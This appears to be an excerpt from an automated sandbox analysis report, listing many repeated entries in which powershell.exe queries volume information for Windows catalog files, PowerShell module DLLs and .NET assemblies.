Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
